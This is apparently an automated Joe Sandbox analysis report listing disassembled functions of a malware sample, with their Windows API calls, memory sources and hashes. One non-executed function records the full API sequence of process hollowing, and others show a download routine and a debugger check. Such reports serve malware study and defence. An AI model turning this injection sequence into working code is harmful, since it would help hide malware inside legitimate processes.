                                                                                    • Part of subcall function 7FE42233: GetProcAddress.KERNEL32(00000000), ref: 7FE42294
                                                                                  • SetErrorMode.KERNELBASE(?,?,?,00000000,?), ref: 7FE42078
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProcess$CurrentErrorInformationModeQuery
                                                                                  • String ID:
                                                                                  • API String ID: 3103590671-0
                                                                                  • Opcode ID: 5e32ed6d6fe555b6a0ca2ad3d36415bc12e317760d8114bbfe3a1a2abba58309
                                                                                  • Instruction ID: c81483a2e740596f7359404f4a145b5a53b95d5c3c8a9364d5f7ea15b65275e3
                                                                                  • Opcode Fuzzy Hash: 5e32ed6d6fe555b6a0ca2ad3d36415bc12e317760d8114bbfe3a1a2abba58309
                                                                                  • Instruction Fuzzy Hash: 42F0C2B29003017AEB116BA1AD01FBF36BEDF51744F11210CFE0295040F7E8E111CA22
                                                                                  Function 0041B7DF Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00417AE4,00000001,00000364,00000006,000000FF,?,?,00413C5C,00417077,?,?,0041614E), ref: 0041B820
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 3e255fc0c61a838c6248b164076c627f9f8ac44f5eb74780f5bccbb7f5568d30
                                                                                  • Instruction ID: 63742792a04592da04a0f61fa0625bf1067a032f83004f4c8284b36c4b684cb6
                                                                                  • Opcode Fuzzy Hash: 3e255fc0c61a838c6248b164076c627f9f8ac44f5eb74780f5bccbb7f5568d30
                                                                                  • Instruction Fuzzy Hash: 40F0BB31241525A79B213A629C45BEB378DEB41B70B158027E814A6290CB68DC81C5EC
                                                                                  Function 0041FA33 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041753A: RtlAllocateHeap.NTDLL(00000000,?,?,?,0041C3F2,00000220,?,?,?,?,?,?,00413CC2,?), ref: 0041756C
                                                                                  • _free.LIBCMT ref: 0041FA53
                                                                                    • Part of subcall function 00417051: HeapFree.KERNEL32(00000000,00000000,?,0041614E), ref: 00417067
                                                                                    • Part of subcall function 00417051: GetLastError.KERNEL32(?,?,0041614E), ref: 00417079
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateErrorFreeLast_free
                                                                                  • String ID:
                                                                                  • API String ID: 314386986-0
                                                                                  • Opcode ID: f0088f2356c7c2dfa5eb86961ee69325601539cb14246dafc8db1efcd535e9d4
                                                                                  • Instruction ID: 7224dc6e1a8b220128579fe07a1e8b1fac0a3f6578c659307eb384b7b0729a11
                                                                                  • Opcode Fuzzy Hash: f0088f2356c7c2dfa5eb86961ee69325601539cb14246dafc8db1efcd535e9d4
                                                                                  • Instruction Fuzzy Hash: 5EF096721057009FD3249F45D501B92F7FCEF54762F10843FE29A875A0D7B8B4858B98
                                                                                  Function 0041753A Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,0041C3F2,00000220,?,?,?,?,?,?,00413CC2,?), ref: 0041756C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: b5ba08d3e027dcbf64db296a7d3a1cb9e23d29b066505b61b45adc95c2aa7c22
                                                                                  • Instruction ID: 3430d67687a4292bbece99345fb55198fe0e6129ef6bb9f5833ae2496ee6f2ce
                                                                                  • Opcode Fuzzy Hash: b5ba08d3e027dcbf64db296a7d3a1cb9e23d29b066505b61b45adc95c2aa7c22
                                                                                  • Instruction Fuzzy Hash: 1FE0E531A88121BBDB2027768C45BDB3A6E9B413B1F150127BC15A2AC0DB7CDCC181ED
                                                                                  Function 0041E300 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,00000000,?,0041E6F0,?,?,00000000,?,0041E6F0,00000000,0000000C), ref: 0041E31D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: f37e5a37cdcaa46bd2bbbe7e3a9687f02ff2bfbfb3955d980ab61bdfe8a43f07
                                                                                  • Instruction ID: 734668a00370914631b4c4fe8fbe1f0e973289ac58342a9305f2a6e88b31aa5d
                                                                                  • Opcode Fuzzy Hash: f37e5a37cdcaa46bd2bbbe7e3a9687f02ff2bfbfb3955d980ab61bdfe8a43f07
                                                                                  • Instruction Fuzzy Hash: 92D06C3210010DBFEF128F84DC06EDA3BAAFB48714F018110BA1856060C732E832EB94
                                                                                  Function 7FE420EC Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 7FE420F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: e58fb04bf8307ef9e59311ad68e6793ee857856729bfdc2c679c958526c6e4bd
                                                                                  • Instruction ID: bbe97fb0fdf796f7d02d65c7dead2db828113409e6ff866594b2fea672e426be
                                                                                  • Opcode Fuzzy Hash: e58fb04bf8307ef9e59311ad68e6793ee857856729bfdc2c679c958526c6e4bd
                                                                                  • Instruction Fuzzy Hash: 71A00134108202AFCE029B14C84884ABFA1AF89391F048898B48987230C73198919A02
                                                                                  Function 7FE433B8 Relevance: 1.5, APIs: 1, Instructions: 3libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 7FE433BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: cdfcc11e70e0831f7f02528ebe527d00d7d7741163f98bb48def171ba165424e
                                                                                  • Instruction ID: 3afe84d9f853e1a58d27be4bc39f2d296b439f338d3e94088f2da92acf5e3481
                                                                                  • Opcode Fuzzy Hash: cdfcc11e70e0831f7f02528ebe527d00d7d7741163f98bb48def171ba165424e
                                                                                  • Instruction Fuzzy Hash: B390023950D101DBCE065B51D90C5197F67AB81351B148458B44540130C7314476DB12
                                                                                  Function 00910011 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,00910011,00910005), ref: 0091003E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708854930.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_910000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  • Opcode ID: 40190bf7e8cdf14306e3f29afdb8aada469a28eae5e895cba225020993eae487
                                                                                  • Instruction ID: 8d354a0e2ce86e65f3ecf62e700a0afcbab37c73c730bb7fd2c4e0288c8b492d
                                                                                  • Opcode Fuzzy Hash: 40190bf7e8cdf14306e3f29afdb8aada469a28eae5e895cba225020993eae487
                                                                                  • Instruction Fuzzy Hash: 54E0B630340B06ABEA309A75DC49FD7B7ECAF48B50F108819B5DAE7190CAA0F881CB14
                                                                                  Function 7FE4256C Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: free
                                                                                  • String ID:
                                                                                  • API String ID: 1294909896-0
                                                                                  • Opcode ID: 2fd9a7ee28f7a9333433644eb5513e4b942047d29e54c439f2e627505d0e5c23
                                                                                  • Instruction ID: f565952d912d69a959799ff31dc89a885d8eb9134e4b96f74b8ad5ccf2072eb3
                                                                                  • Opcode Fuzzy Hash: 2fd9a7ee28f7a9333433644eb5513e4b942047d29e54c439f2e627505d0e5c23
                                                                                  • Instruction Fuzzy Hash: 18B09235009300EBCA014E90D6083A9BBA6EB80616F20841CB057100A087344824EA02

                                                                                  Non-executed Functions

                                                                                  Function 004023F0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 155injectionthreadmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0040240C
                                                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 00402465
                                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 0040247E
                                                                                  • GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 00402493
                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 004024B6
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,00000000), ref: 004024CE
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004024D5
                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 004024F4
                                                                                  • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 0040250F
                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 0040254C
                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 0040257C
                                                                                  • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00402592
                                                                                  • ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 0040259B
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 004025A9
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 004025C0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                  • API String ID: 4033543172-1050664331
                                                                                  • Opcode ID: dce348d52fc12c30c3f40679117718e82f8cd84188ec2c5c3b09c48dccf8250f
                                                                                  • Instruction ID: 0cf2af8ff4cb9ebe9ad3a028e61cb307d682e6666ed8a870c62b8345505061bc
                                                                                  • Opcode Fuzzy Hash: dce348d52fc12c30c3f40679117718e82f8cd84188ec2c5c3b09c48dccf8250f
                                                                                  • Instruction Fuzzy Hash: 90516B71B40605BBEB218B94DD49FAEBBB8FF08705F504029FB04E62D0DBB4A955CB58
                                                                                  Function 004200E8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1354COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __floor_pentium4
                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                  • API String ID: 4168288129-2761157908
                                                                                  • Opcode ID: 7e192a2d6edb674bac6ae2520044e3f9176c082f7df3f3cc1a8e65cac12922a5
                                                                                  • Instruction ID: f11b0946b219d80c9c4994a3db4a249dc7606d6354bf08b79d7004ad96fd2d67
                                                                                  • Opcode Fuzzy Hash: 7e192a2d6edb674bac6ae2520044e3f9176c082f7df3f3cc1a8e65cac12922a5
                                                                                  • Instruction Fuzzy Hash: 37C22771E046288FDB24CE28ED407EAB7F5EB98304F5441EBD84DA7241E779AE818F45
                                                                                  Function 0040700B Relevance: 7.6, APIs: 5, Instructions: 140networkfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00407027
                                                                                  • InternetReadFile.WININET(?,?,?,?), ref: 00407038
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407043
                                                                                  • InternetCloseHandle.WININET(?), ref: 00407052
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00407055
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandleInternet$File$ReadWrite
                                                                                  • String ID:
                                                                                  • API String ID: 567989605-0
                                                                                  • Opcode ID: a5ff44ab7690251a4212ff983c3b9e62a1d5190aa102251ff27f215237c26012
                                                                                  • Instruction ID: 0befd039b9f6f23f188f44fdc35fa4c94dfec532a1c9f815e2cf11e5f32d5d3d
                                                                                  • Opcode Fuzzy Hash: a5ff44ab7690251a4212ff983c3b9e62a1d5190aa102251ff27f215237c26012
                                                                                  • Instruction Fuzzy Hash: 0841E3B2A00108ABEF14DF64CD85ADE7769EB44314F50422AF814E72D1D73DEAC5CB65
                                                                                  Function 004048B0 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00404906
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  • API String ID: 1889659487-0
                                                                                  • Opcode ID: 0f025ffa198d0d7022a407a98512d5e112d5bbb831194b6e2c6a1f9a8583f53c
                                                                                  • Instruction ID: 9845d94b91b6e2e22d79ee33288a69cd07ea54fe1f5ed6569b72d1a69a429842
                                                                                  • Opcode Fuzzy Hash: 0f025ffa198d0d7022a407a98512d5e112d5bbb831194b6e2c6a1f9a8583f53c
                                                                                  • Instruction Fuzzy Hash: 64312CB0D102189BDB24AB78DC4A7DEB774EF81314F90427AE904772C1EB784A858BDD
                                                                                  Function 004154F3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004155EB
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004155F5
                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415602
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: 203ecd29b69171333ff07b260291656cb257e9580009599efc4fa298bffbf476
                                                                                  • Instruction ID: c10a657a53a1c55608afa62ec5e352b41855ae06275bee5b422f8a94e28dd03b
                                                                                  • Opcode Fuzzy Hash: 203ecd29b69171333ff07b260291656cb257e9580009599efc4fa298bffbf476
                                                                                  • Instruction Fuzzy Hash: 2031D674911218DBCB21DF24D8897DDBBB4BF48310F5041EAE51CA72A1EB349BC58F58
                                                                                  Function 7FE422AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 7FE422BE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationProcessQuery
                                                                                  • String ID: "
                                                                                  • API String ID: 1778838933-123907689
                                                                                  • Opcode ID: 5181fdecd4193bb3fa01cbdba47f40383d5f5fd10bcedd4e98d75df3e82d9c53
                                                                                  • Instruction ID: 2c8ef7b1c8eca7f7deb358364d2715b228b4d49e9b3a42585da813b623d10d52
                                                                                  • Opcode Fuzzy Hash: 5181fdecd4193bb3fa01cbdba47f40383d5f5fd10bcedd4e98d75df3e82d9c53
                                                                                  • Instruction Fuzzy Hash: 53E0EC32010319ABDF124E81D8008DA7F69EF09261B049019FE0566020D37195B0EF94
                                                                                  Function 0041FC50 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 23d482466ea73e09b40eb697065454e3dc54c328f3627eb8fdfa93bff6c80085
                                                                                  • Instruction ID: 19ad051aaa72e5f735da68453a41798ac7d9f01dc2464858c255c7c864b97af0
                                                                                  • Opcode Fuzzy Hash: 23d482466ea73e09b40eb697065454e3dc54c328f3627eb8fdfa93bff6c80085
                                                                                  • Instruction Fuzzy Hash: 98F16C71E002199FDF14CFA8D8806EEBBF1FF89314F25826AD819A7341D734A946CB94
                                                                                  Function 0041F3E4 Relevance: 3.1, APIs: 2, Instructions: 91timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0041F3F4
                                                                                    • Part of subcall function 00417051: HeapFree.KERNEL32(00000000,00000000,?,0041614E), ref: 00417067
                                                                                    • Part of subcall function 00417051: GetLastError.KERNEL32(?,?,0041614E), ref: 00417079
                                                                                  • GetTimeZoneInformation.KERNEL32 ref: 0041F406
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorFreeHeapInformationLastTimeZone_free
                                                                                  • String ID:
                                                                                  • API String ID: 3107070095-0
                                                                                  • Opcode ID: 52d799d72399e5ba68a91474c9e94019fbd1233e3e2634ebc9904a5fba90b6ed
                                                                                  • Instruction ID: ea7a1ecbc31cc5376e43bcadb82d0aed8138a0eb16aef23da463dff7e28be481
                                                                                  • Opcode Fuzzy Hash: 52d799d72399e5ba68a91474c9e94019fbd1233e3e2634ebc9904a5fba90b6ed
                                                                                  • Instruction Fuzzy Hash: CB310471904201EFCB00DF69DD829AA7BB4BF19310714157FE011A73A1D3749D86DB58
                                                                                  Function 004242FD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004242F8,?,?,00000008,?,?,00423F90,00000000), ref: 0042452A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise
                                                                                  • String ID:
                                                                                  • API String ID: 3997070919-0
                                                                                  • Opcode ID: 626d7bc85a923e7a248c1617647a2d264e93360ffb34c7221947944a9a40a401
                                                                                  • Instruction ID: c93ffd11fc343f0719af2e7a338e13f5e0999d263cc02b2764082811fa3f5b4e
                                                                                  • Opcode Fuzzy Hash: 626d7bc85a923e7a248c1617647a2d264e93360ffb34c7221947944a9a40a401
                                                                                  • Instruction Fuzzy Hash: AAB16A31210618DFDB14CF28D486B657BA0FF84364F698659E9DACF3A1C339E992CB44
                                                                                  Function 00410C73 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00410C89
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor
                                                                                  • String ID:
                                                                                  • API String ID: 2325560087-0
                                                                                  • Opcode ID: 283bb2b6896100fd3a1834810aea6a6ee14fe2e7bfe170985276d8c517baffc9
                                                                                  • Instruction ID: 07181a27f8cc3d66e9c763cee52dfa73a11162c65df484747116efb15693d575
                                                                                  • Opcode Fuzzy Hash: 283bb2b6896100fd3a1834810aea6a6ee14fe2e7bfe170985276d8c517baffc9
                                                                                  • Instruction Fuzzy Hash: 555171719012199FDB19CF99EA817EABBF0FB48314F14857AD409EB350D3B8D980CB68
                                                                                  Function 00410FB8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00010FC4,00410ABD), ref: 00410FBD
                                                                                  Memory Dump Source
